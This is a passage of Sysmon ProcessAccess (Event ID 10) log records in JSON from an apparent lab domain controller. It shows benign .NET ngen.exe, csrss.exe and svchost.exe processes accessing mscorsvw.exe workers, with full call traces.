C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.386","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010A5BC0D00}","TargetProcessId":"488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6874,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.386\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010A5BC0D00}\r\nTargetProcessId: 488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.386","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010A5BC0D00}","TargetProcessId":"488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6875,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.402\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010A5BC0D00}\r\nTargetProcessId: 488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.402","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010A5BC0D00}","TargetProcessId":"488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6876,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.433\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001078C00D00}\r\nTargetProcessId: 4308\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.433","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001078C00D00}","TargetProcessId":"4308","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6877,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.433\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001078C00D00}\r\nTargetProcessId: 4308\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.433","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001078C00D00}","TargetProcessId":"4308","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6878,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.449\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001078C00D00}\r\nTargetProcessId: 4308\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.449","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001078C00D00}","TargetProcessId":"4308","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6879,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.480\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001056C40D00}\r\nTargetProcessId: 2936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.480","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001056C40D00}","TargetProcessId":"2936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6880,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.480\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001056C40D00}\r\nTargetProcessId: 2936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.480","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001056C40D00}","TargetProcessId":"2936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
